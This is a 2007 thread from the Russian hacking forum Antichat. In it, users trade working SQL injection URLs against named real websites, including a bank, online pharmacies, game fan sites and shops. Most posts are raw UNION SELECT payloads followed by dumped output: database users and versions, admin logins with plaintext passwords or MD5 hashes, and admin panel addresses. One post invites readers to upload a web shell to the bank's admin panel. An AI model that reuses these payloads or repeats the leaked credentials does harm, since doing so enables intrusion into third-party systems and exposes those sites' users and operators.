ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.10.2007, 10:11
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
admin@localhost:5.0.27-log:runescape
выводим количество таблиц
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+from+information_schema.tables/*
142, =///
выводим таблицы, где есть колонка password
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x3a,table_name),5+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/*
lotro:adds_users
runescape:adds_users
war:adds_users
выводим, например, колонки из lotro:adds_users
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+from+information_schema.columns+where+table_schema=char(108,111,116,114,111)+and+table_name=char(97,100 ,100,115,95,117,115,101,114,115)+limit+0,1/*
user_id
user_name
password
итд
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+lotro.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+war.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+runescape.adds_users/*
итд лимитом |
|
|
13.10.2007, 17:08
|
|
Banned
Регистрация: 06.10.2006
Сообщений: 288
Провел на форуме:
2741921
Репутация:
469
|
|
www.uselessjunk.com
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,versio n(),0x3a,database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*
ну тут всё понятно)
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23+from+INFORMATION _SCHEMA.TABLES+LIMIT+16,1/*
админы
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_admin+limit+0,1/*
Юзеры
http://www.uselessjunk.com/article_full.php?id=-1+union+select+1,2,3,4,5,concat(fld_username,0x3a, fld_password),7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+tbl_users+limit+0,1/*
Админка
www.uselessjunk.com/admin.php
админы:
id:name:pass
1:admin: tigerwoods
2:hoover: stile
3:turtle: turtleuj2007
4:matt: diabl0
Последний раз редактировалось Underwit; 13.10.2007 в 20:08..
|
|
|
|
13.10.2007, 17:48
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
-------------удалено---боян--------------
www.rare.ru
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,concat(version(),0x2F,databa se(),0x2F,user()),5/*
5.0.45-log/rareru/rareru@10.10.10.216
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,table_name,table_schema+from +information_schema.tables/*
Таблицы можно покопаться
http://www.rare.ru/show.php?index=-13+union+select+1,2,3,pass,login+from+users/*
логин\хеш
Последний раз редактировалось Grey; 13.10.2007 в 18:21..
Причина: Одна из инъекций боян.
|
|
|
|
13.10.2007, 20:46
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(user(),0x3a,version( ),0x3a,database())/*&pi=1&PHPSESSID=
zero@jafo.netdojo.net:4.1.22-standard:zero2
Код:
http://www.zeromag.com/articles/article_view.php?id=-1'+union+select+1,2,3,4,5,concat(username,0x3a,password)+f rom+users/*&pi=1&PHPSESSID=
rootadmin:cd92a26534dba48cd785cdcc0b3e6bd1 итд.. <395
Код:
http://www.confidence-mag.com/story.php?id=-7+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16/*
v115400@dd5428.kasserver.com:4.0.23-Max-log:v115400 |
|
|
|
13.10.2007, 21:14
|
|
Участник форума
Регистрация: 30.05.2007
Сообщений: 115
Провел на форуме:
496690
Репутация:
135
|
|
Код:
http://www.yuretz.ru/prikol.php?id=-471+union+select+1,convert(version()+using+cp1251),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
|
|
|
|
13.10.2007, 22:13
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
z-chat.ru
http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(version(),0x2F,database(),0x 2F,user()),2/*
4.0.25/zchatspb/zchatspb@local
http://www.z-chat.ru/inc/birthday.php?day=16&month=-5+union+select+concat(login,0x2F,passwd,0x2F,icq), 2+from+user/*
логин\хеш\уин но там какой-то прикол с выводом .... наверно ограничение на длину строки .. хотя хз
да, можно выводить отдельно логин хеш и уин но так не красиво )
Последний раз редактировалось ElteRUS; 13.10.2007 в 22:25..
|
|
|
|
14.10.2007, 14:53
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
reporter.kherson.ua
http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4,5,6,7,8,9/*
5.0.32-Debian_7etch1-log:reporter:lsd@localhost
http://www.reporter.kherson.ua/article.php?sid=-1+union+select+1,2,3,uname,5,6,7,pass,9+from+users +limit+7,1/*
логин \ пароль
|
|
|
|
14.10.2007, 16:25
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://drugspharma.com/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version (),0x3a,database()),5,6,7, 8,9,10,11/*
hunting_tkdph@localhost:4.1.22-standard:hunting_tkrx
Код:
http://refill-rx.net/index.php?mod=cart&quantity=1&action=add&ID=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,datab ase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
pdlweb@localhost:4.1.22-standard:pdlweb_Pharmacy |
|
|
|
14.10.2007, 16:43
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
БашкомснабБанк
http://www.bashkomsnabbank.ru/news/view?id=-133+union+select+1,2, 3,concat(login,0x3a, password),5,6,7+from+users+limit+2,10/*
Version:4.0.27-standard-log
User:bashbank@localhost
6 юзеров, все имеют доступ к обминке, среди которых:
denis:72d0d440b5ebc3cb162bf2cbd0f680ee:za1og
blair:098f6bcd4621d373cade4e832627b4f6:test
http://www.bashkomsnabbank.ru/admin
Кто не боится, заливаем шелл 
Последний раз редактировалось 0nep@t0p; 14.10.2007 в 16:45..
|
|
|
|
14.10.2007, 16:45
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
Код:
http://bestposters.ru/main.php?cat=-70+union+select+1,2,concat(login,0x3a,password,0x3a,email),4,5+from+users+limit+1/*
Шоп по продаже постеров.
P.S: работаем через лимит ) |
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
